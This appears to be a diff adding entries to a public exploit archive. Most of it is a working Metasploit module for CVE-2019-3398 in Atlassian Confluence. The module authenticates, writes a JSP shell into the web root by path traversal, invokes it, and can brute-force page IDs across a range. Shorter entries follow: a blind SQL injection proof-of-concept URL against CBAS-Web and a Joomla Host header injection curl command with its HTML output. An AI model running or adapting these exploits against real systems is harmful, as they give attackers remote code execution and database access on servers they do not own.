+ USERNAME and PASSWORD - the login/password to log into the web interface of the Atlassian Confluence server.
+ ROOTFOLDER - the root directory of the web server. If the root directory is located in C:\confluence\pages\, set this variable to ROOTFOLDER = 'confluence/pages/'.
+ Typical ROOTFOLDER locations are:
+ Windows: Program Files/Atlassian/Confluence/confluence/pages/
+ Linux: opt/atlassian/confluence/confluence/pages/
+ Note that the root directory of the web server and the temporary directory of the Atlassian Confluence server on Windows must be on the same drive (C:\ in the example above).
+ PAGEID - the pageId URL parameter you see in the browser address bar when you vist the Atlassian Confluence page where you have rights to upload files.
+ For example, https://server.net/pages/viewpageattachments.action?pageId=111111111&metadataLink=true.
+ If PAGEID is set to 0, the script will try to create a new Page ID. If it fails, it will try to create a new space and create a Page ID there.
+ If PAGEID is not specified, the script will walk though the PAGEID_RANGE_START..PAGEID_RANGE_END range.
+ The script gets authenticated to the Atlassian Confluence server, retrieves the ATLASSIAN TOKEN from the server response, uploads the shellcode, then imitates the 'Download all' action to place the shellcode to the root directory of the web server.
+ Tested on Atlassian v6.15.1. on Linux and Windows.
+ Note that on Linux Confluence runs under the 'confluence' account which may not have rights to save files in the root directory of the web server. In this case the exploit will fail. Also, to create a new space and get the list of existing spaces the script makes use of Confluence REST API, which is available starting from Confluence Server 5.5.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'Maxim Guslyaev' # Metasploit module
+ ],
+ 'References' =>
+ [
+ [ 'CVE', '2019-3398' ],
+ [ 'URL', 'https://confluence.atlassian.com/doc/confluence-security-advisory-2019-04-17-968660855.html' ],
+ [ 'URL', 'https://devcentral.f5.com/s/articles/confluence-arbitrary-file-write-via-path-traversal-cve-2019-3398-34181'],
+ [ 'URL', 'https://nvd.nist.gov/vuln/detail/CVE-2019-3398']
+ ],
+ 'Privileged' => false,
+ 'Platform' => %w{ linux win },
+ 'Targets' =>
+ [
+ [ 'Windows', { 'Platform' => 'win', 'Arch' => ARCH_JAVA }],
+ [ 'Linux', { 'Platform' => 'linux', 'Arch' => ARCH_JAVA }]
+ ],
+ 'DefaultOptions' =>
+ {
+ 'RPORT' => 8090,
+ 'SSL' => false
+ },
+ 'DisclosureDate' => 'Nov 9 2019',
+ 'DefaultTarget' => 0
+ ))
+
+ register_options(
+ [
+ OptString.new('USERNAME', [true, 'The login to log into the web interface of the Atlassian Confluence server', 'test']),
+ OptString.new('PASSWORD', [true, 'The password to log into the web interface of the Atlassian Confluence server', 'test']),
+ OptString.new('ROOTFOLDER', [true, 'The root folder of the Atlassian Confluence server', 'Program Files/Atlassian/Confluence/confluence/pages/']),
+ #OptString.new('ROOTFOLDER', [true, 'The root folder of the Atlassian Confluence server', 'opt/atlassian/confluence/confluence/pages/']),
+ OptString.new('FILENAME', [true, 'The JSP shellcode file name', 'covfefe.jsp']),
+ OptString.new('TARGETURI', [true, 'The base to Confluence', '/']),
+ OptString.new('NEWSPACE', [false, 'A new space to be created', 'TESTSPACE432545645']),
+ OptInt.new('PAGEID', [false, 'A Page ID to be used to upload shellcode', 0]),
+ OptInt.new('PAGEID_RANGE_START', [false, 'The first Page ID to be used to enumerate a writable Page ID (used when PAGEID is not specified)', '1']),
+ OptInt.new('PAGEID_RANGE_END', [false, 'The last Page ID to be used to enumerate a writable Page ID (used when PAGEID is not specified)', '999999999']),
+
+ ], self.class)
+end
+
+def do_authenticate
+ print_status("Sending POST request to the web application (authentication)...")
+ res = send_request_cgi({
+ 'uri' => normalize_uri(target_uri.path.to_s, '/dologin.action'),
+ 'method' => 'POST',
+ 'vars_post' => {
+ 'os_username' => datastore['USERNAME'],
+ 'os_password' => datastore['PASSWORD'],
+ 'os_destination' => '',
+ 'login' => 'Log+In'
+ }
+ })
+ if res.nil?
+ print_status("Unable to access the web application!")
+ return 0
+ end
+ @sessid = get_sid(res)
+ if @sessid.nil?
+ print_status("Unable to retrieve session ID!")
+ return 0
+ end
+ print_status("Getting Session ID from the web application... #{@sessid}")
+
+ if res && res.redirect?
+ location = res.redirection
+ if location.nil?
+ print_status("Unable to access the web application when redirected!")
+ return 0
+ end
+ res = send_request_cgi!({
+ 'uri' => normalize_uri(target_uri.path.to_s, location.to_s),
+ 'method' => 'GET',
+ 'headers' => {
+ 'Cookie' => @sessid
+ }
+ }, redirect_depth = 5)
+ end
+
+ if res && res.code == 200
+ if res.body =~ /re-enter\syour\slogin/ || res.body =~ /Sorry,\syour\susername\sand\/or\spassword\sare\sincorrect/ || res.body =~ /Unauthorized/
+ print_status("Authentication failed...")
+ return 0
+ end
+
+ @xsrf_token = res.get_html_document.at('meta[@id="atlassian-token"]')['content']
+ if @xsrf_token.nil? or @xsrf_token.blank?
+ print_status("Failed to retrieve XSRF token...")
+ return 0
+ else
+ print_status("Retrieving XSRF token... #{@xsrf_token}")
+ return 1
+ end
+ else
+ print_status("Unexpected response from the web application...")
+ return 0
+ end
+end
+
+def do_upload(_pageid)
+ print_status("Sending POST request to the web application (shellcode upload)...")
+ res = send_request_cgi({
+ 'uri' => normalize_uri(target_uri.path.to_s, '/plugins/drag-and-drop/upload.action'),
+ 'method' => 'POST',
+ 'vars_get' => {
+ 'pageId' => _pageid,
+ 'filename' => '../../../../../../../../../../' + datastore['ROOTFOLDER'] + datastore['FILENAME'],
+ 'size' => payload.encoded.length,
+ 'mimeType' => 'text/plain',
+ 'spaceKey' => 'isis',
+ 'atl_token' => @xsrf_token,
+ 'name' => datastore['FILENAME']
+ },
+ 'data' => payload.encoded,
+ 'headers' => {
+ 'Connection' => 'close',
+ 'Accept' => '*/*',
+ 'Accept-Encoding' => 'identity',
+ 'Cookie' => @sessid,
+ 'Content-Length' => payload.encoded.length,
+ 'Content-Type' => 'text/plain'
+ }
+ })
+ if res && res.code == 200 && res.body.scan(/actionErrors/).blank?
+ print_status("Shellcode uploaded...")
+ return 1
+ else
+ return 0
+ end
+end
+
+def do_downloadall(_pageid)
+ for downloadall_iter in 1..10
+ print_status("Sending GET request to the web application (downloadall)...")
+ res = send_request_cgi({
+ 'uri' => normalize_uri(target_uri.path.to_s, '/pages/downloadallattachments.action'),
+ 'method' => 'GET',
+ 'vars_get' => {
+ 'pageId' => _pageid
+ },
+ 'headers' => {
+ 'Cookie' => @sessid
+ }
+ })
+
+ print_status("Sending GET request to the web application (shellcode invokation)...")
+ res = send_request_cgi({
+ 'uri' => normalize_uri(target_uri.path.to_s, '/pages/' + datastore['FILENAME']),
+ 'method' => 'GET',
+ 'headers' => {
+ 'Cookie' => @sessid
+ }
+ }, timeout = 10)
+
+ if res && res.code == 200
+ print_status("Shellcode found...")
+ return 1
+ else
+ if downloadall_iter == 10
+ print_status("Shellcode not found...")
+ return 0
+ end
+ end
+ end
+end
+
+def do_getspaces
+ print_status("Sending GET request to the web application (getting available spaces)...")
+ res = send_request_cgi({
+ 'uri' => normalize_uri(target_uri.path.to_s, '/rest/api/space'),
+ 'method' => 'GET',
+ 'headers' => {
+ 'User-Agent' => 'python-requests/2.20.0',
+ 'Cookie' => @sessid,
+ 'Accept' => '*/*',
+ 'Accept-Encoding' => 'identity',
+ 'Content-Type' => 'application/json'
+ }
+ })
+
+ if res && res.code == 200 && res.body =~ /results/
+ space_list = res.body.scan(/\"key\":\"(\w+)\"/).flatten
+ else
+ space_list = Array([])
+ end
+ return space_list
+end
+
+def do_createspace
+ print_status("Sending POST request to the web application (creating a space)...")
+ res = send_request_cgi({
+ 'uri' => normalize_uri(target_uri.path.to_s, '/rest/api/space'),
+ 'method' => 'POST',
+ 'data' => {
+ "key": datastore['NEWSPACE'],
+ "name": "Example space",
+ "description": {
+ "plain": {
+ "value": "This is an example space",
+ "representation": "plain"
+ }
+ },
+ "metadata": {}
+ }.to_json,
+ 'headers' => {
+ 'User-Agent' => 'python-requests/2.20.0',
+ 'Cookie' => @sessid,
+ 'Accept-Encoding' => 'identity',
+ 'Content-Type' => 'application/json'
+ }
+ })
+
+ if res && res.code == 200 && res.body =~ /\"key\":\"\w+\"/
+ print_status("Space created...")
+ return res.body.scan(/\"key\":\"(\w+)\"/).flatten[0]
+ else
+ print_status("Space not created...")
+ return 0
+ end
+end
+
+def do_createpage(_space)
+ print_status("Sending GET request to the web application (creating Page ID), space #{_space}...")
+ res = send_request_cgi({
+ 'uri' => normalize_uri(target_uri.path.to_s, '/pages/createpage.action?spaceKey='+_space),
+ 'method' => 'GET',
+ 'headers' => {
+ 'Cookie' => @sessid
+ }
+ })
+ if res && res.code == 200 && res.body =~ /ajs-draft-id/
+ pageid = res.get_html_document.at('meta[@name="ajs-draft-id"]')['content']
+ pageid_parsed = /(\d+)/.match(pageid)
+ if pageid_parsed.nil?
+ print_status("Unexpected Page ID format...")
+ return 0
+ else
+ print_status("Page ID created... #{pageid}")
+ datastore['PAGEID'] = pageid
+ return 1
+ end
+ else
+ return 0
+ end
+end
+
+def get_sid(res)
+ if res.nil?
+ return ''
+ end
+ res.get_cookies.scan(/(JSESSIONID=\w+);*/).flatten[0] || ''
+end
+
+
+def exploit
+ print_status("Getting authenticated to the web application...")
+ if do_authenticate != 1
+ fail_with(Failure::Unknown, 'Initial access or authentication error!')
+ end
+
+ unless datastore['PAGEID'].blank?
+ if datastore['PAGEID'] == 0
+ print_status("Creating Page ID...")
+ spaces = do_getspaces
+ for sp in spaces
+ if do_createpage(sp) == 1
+ print_status("Uploading shellcode...")
+ if do_upload(datastore['PAGEID']) != 1
+ print_status("Failed to upload shellcode...")
+ next
+ end
+ print_status("Invoking shellcode...")
+ if do_downloadall(datastore['PAGEID']) != 1
+ print_status("Failed to invoke shellcode...")
+ next
+ else
+ return
+ end
+ end
+ end
+
+ print_status("Trying to create a new space...")
+ new_sp = do_createspace
+
+ if new_sp != 0
+ if do_createpage(new_sp) == 1
+ print_status("Uploading shellcode...")
+ if do_upload(datastore['PAGEID']) != 1
+ fail_with(Failure::Unknown, 'Error while uploading shellcode!')
+ end
+ print_status("Invoking shellcode...")
+ if do_downloadall(datastore['PAGEID']) != 1
+ fail_with(Failure::Unknown, 'Error while invoking shellcode!')
+ end
+
+ return
+ else
+ fail_with(Failure::Unknown, 'Error while creating page in the newly created space!')
+ end
+ else
+ fail_with(Failure::Unknown, 'Error while creating space!')
+ end
+ end
+
+ print_status("Uploading shellcode...")
+ if do_upload(datastore['PAGEID']) != 1
+ fail_with(Failure::Unknown, 'Error while uploading shellcode!')
+ end
+ print_status("Invoking shellcode...")
+ if do_downloadall(datastore['PAGEID']) != 1
+ fail_with(Failure::Unknown, 'Error while invoking shellcode!')
+ end
+ else
+ for id in datastore['PAGEID_RANGE_START']..datastore['PAGEID_RANGE_END']
+ print_status("Trying Page Id #{id}")
+ print_status("Uploading shellcode...")
+ if do_upload(id) == 1
+ print_status("Invoking shellcode...")
+ if do_downloadall(id) == 1
+ break
+ end
+ end
+ end
+ end
+
+end
+
+def check
+ res = send_request_cgi!({
+ 'uri' => normalize_uri(target_uri.path.to_s, '/login.action?anon=1&logout=1'),
+ 'method' => 'GET',
+ }, redirect_depth = 5)
+
+ if res && res.body =~ /Powered\sby/
+ ver = res.body.scan(/^.*Powered\sby\s.*(\d{1,}\.\d{1,}\.\d{1,}).*$/).flatten[0]
+ print_status("The version of the web application is #{ver}")
+ ver_parsed = /(\d+)\.(\d+)\.(\d+)/.match(ver.to_s)
+ if ver_parsed.nil?
+ print_status("The version of the web application couldn't be parsed")
+ return Exploit::CheckCode::Detected
+ end
+ ver_oct1 = ver_parsed[1].to_i
+ ver_oct2 = ver_parsed[2].to_i
+ ver_oct3 = ver_parsed[3].to_i
+
+ if ver_oct1.between?(2, 6) && ver_oct2.between?(0, 6) && ver_oct3.between?(0, 12) || ver_oct1.between?(6, 6) && ver_oct2.between?(7, 12) && ver_oct3.between?(0, 3) || ver_oct1.between?(6, 6) && ver_oct2.between?(13, 13) && ver_oct3.between?(0, 3) || ver_oct1.between?(6, 6) && ver_oct2.between?(14, 14) && ver_oct3.between?(0, 2) || ver_oct1.between?(6, 6) && ver_oct2.between?(15, 15) && ver_oct3.between?(0, 1)
+ return Exploit::CheckCode::Appears
+ else
+ return Exploit::CheckCode::Safe
+ end
+
+ else
+ return Exploit::CheckCode::Unknown
+ end
+end
+
+end
\ No newline at end of file
diff --git a/exploits/php/webapps/47631.txt b/exploits/php/webapps/47631.txt
new file mode 100644
index 000000000..507cdad9b
--- /dev/null
+++ b/exploits/php/webapps/47631.txt
@@ -0,0 +1,16 @@
+# Exploit Title: CBAS-Web 19.0.0 - 'id' Boolean-based Blind SQL Injection
+# Google Dork: NA
+# Date: 2019-11-11
+# Exploit Author: LiquidWorm
+# Vendor Homepage: https://www.computrols.com/capabilities-cbas-web/
+# Software Link: https://www.computrols.com/building-automation-software/
+# Version: 19.0.0
+# Tested on: NA
+# CVE : N/A
+# Advisory: https://applied-risk.com/resources/ar-2019-009
+# Paper: https://applied-risk.com/resources/i-own-your-building-management-system
+
+# Computrols CBAS-Web Authenticated Boolean-based Blind SQL Injection
+# PoC (id param):
+
+http://192.168.1.250/cbas/index.php?m=servers&a=start_pulling&id=1 AND 2510=2510
\ No newline at end of file
diff --git a/exploits/php/webapps/47632.txt b/exploits/php/webapps/47632.txt
new file mode 100644
index 000000000..bcbb83eb3
--- /dev/null
+++ b/exploits/php/webapps/47632.txt
@@ -0,0 +1,237 @@
+# Exploit Title: Joomla 3.9.13 - 'Host' Header Injection
+# Author: Pablo Santiago
+# Date: 2019-11-12
+# Vendor Homepage: https://www.joomla.org/
+# Source: https://downloads.joomla.org/cms/joomla3/3-9-13/Joomla_3-9-13-Stable-Full_Package.zip?format=zip
+# Version: 3.9.13
+# CVE : N/A
+# Tested on: Windows 10
+
+#PoC
+
+curl http://localhost/joomla/ -H "Host: exploit-db.com"
+
+
+
+
+
+
+
+
+
+ Home
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ -
+ You are here:
+
+
+ -
+
+ Home
+
+
+
+
+
+
+
+
+
+